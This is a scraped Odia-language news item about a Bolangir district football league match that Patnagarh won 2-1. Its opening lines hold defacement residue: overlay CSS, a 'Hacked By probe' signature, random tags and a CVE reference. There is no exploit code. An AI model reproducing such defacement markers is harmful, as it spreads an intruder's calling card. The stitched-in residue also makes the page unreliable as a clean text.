html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPNTKY4V9V
`58; Hacked By probe `68;
[ HXIMPntky4v9v ]
HXIMPntky4v9v
CVE-2026-49049 | import vector

ବଲାଙ୍ଗିର ଫୁଟବଲ  ଲିଗ୍,ପାଟଣାଗଡ ବିଜୟୀ 

User Rating: 5 / 5

Star ActiveStar ActiveStar ActiveStar ActiveStar Active
 

ବଲାଙ୍ଗିର(ନିରୋଜ ମିଶ୍ର) - ବଲାଙ୍ଗିର ଜିଲ୍ଲା କ୍ରୀଡା ସଂସଦ ତରଫରୁ ଆୟୋଜିତ ପଲ୍ଲିଶ୍ରୀ ଷ୍ଟାଡିୟମ ସଦାଇପାଲି ବଲାଙ୍ଗିରଠାରେ ଅନୁଷ୍ଠିତ  ଲିଗ୍ ମ୍ୟାଚରେ ପାଟଣେଶ୍ୱରୀ କ୍ଳବ ପାଟଣାଗଡ ୨-୧ ଗୋଳରେ ଇଲେଭେନଷ୍ଟାର ବଲାଙ୍ଗିର କୁ ହରାଇ ବିଜୟୀ ହୋଇଛି । ଖେଳର ପ୍ରଥମାର୍ଦ୍ଧରେ ପାଟଣାଗଡ ଦଳର ବାବୁଲୁ ଦାସ ୨ଟି ଗୋଲ ଦେଇଥିବା ବେଳେ, ଦ୍ୱିତୀୟାର୍ଦ୍ଧରେ ଇଲେଭେନ ଷ୍ଟାର ଦଳର ବିରେନ୍ଦ୍ର ଗୁରୁ ଗୋଟିଏ ଗୋଲ ଦେଇଥିଲେ । ଜିଲ୍ଲା କ୍ରୀଡାସଂସଦ ବରିଷ୍ଠ ସଦସ୍ୟ ଡ. ସିଦ୍ଧେଶ୍ୱର  ମିଶ୍ରଙ୍କ ତତ୍ୱାବଧାନରେ ଅନୁଷ୍ଠିତ ଖେଳରେ ଅତିଥିଭାବେ ସୁପ୍ରିମଟାକ୍ସ ଡାଇରେକ୍ଟର ଅଜିତ ପାଳ, କ୍ରୀଡାବିତ ତଥା ଆଗଳପୁର ଏଏ  ସଭାପତି ଭିକାରି ଚରଣ ବାଗ ଓ ପୁର୍ବତନ ଖେଳାଳି ତଥା ସିସିଏଫଏ ବଲାଙ୍ଗିର ସଭାପତି ଜ୍ୟୋତିରାଜ ନାଗ ଯୋଗଦେଇଥିଲେ । ସାଇଟ ସମ୍ପାଦକ ମନୋଜ କୁମାର ମିଶ୍ର, କ୍ରୀଡାସଂସଦର ଏଥେଲେଟିକ ସମ୍ପାଦକ ବିଭୁତି ଭୁଷଣ ପଣ୍ଡା, ବଲାଙ୍ଗିର ବ୍ଳକ ଅଧ୍ୟକ୍ଷ ଗୋଳାପ ବାଗ, କ୍ରୀଡାସଙ୍ଗଠକ ହେମନ୍ତ ବେହେରା, ଶ୍ରୀଧର ସେଠ, ନରସିଂସ୍ୱାମୀ ନାଇଡୁ, ସଂଜିତ ମହାନ୍ତି ପ୍ରମୁଖ ମଂଚାସୀନ ଥାଇ ଖେଲାଳି ମାନଙ୍କୁ ଉତ୍ସାହିତ କରିଥିଲେ । ଖେଳକୁ ଖଲିଉଲ ରହମାନ, ସୁଦର୍ଶନ ସେଠ, ଦେବାଶିଷ ବାଗ ଓ ସୁଧାସୁଂ ସେଠ ପରି·ଳନା କରିଥିଲେ ।  ୧୭ ତାରିଖ ସୋମବାର ଗାନ୍ଧି ଷ୍ଟାଡିୟମ ବଲାଙ୍ଗିର ଠାରେ ଅମାମୁଣ୍ଡା ଏଏ ବନାମ ପାଟଣେଶ୍ୱର କ୍ଳବ ପାଟଣାଗଡ ମଧ୍ୟର ଖେଳ ହେବ ବୋଲି କ୍ରୀଡାସଂସଦ ପକ୍ଷରୁ ସାଧାରଣ ସମ୍ପାଦକ ହରିନାରାୟଣ ପୁଜାରୀ ଜଣାଇଛନ୍ତି । 

 

 

0
0
0
s2sdefault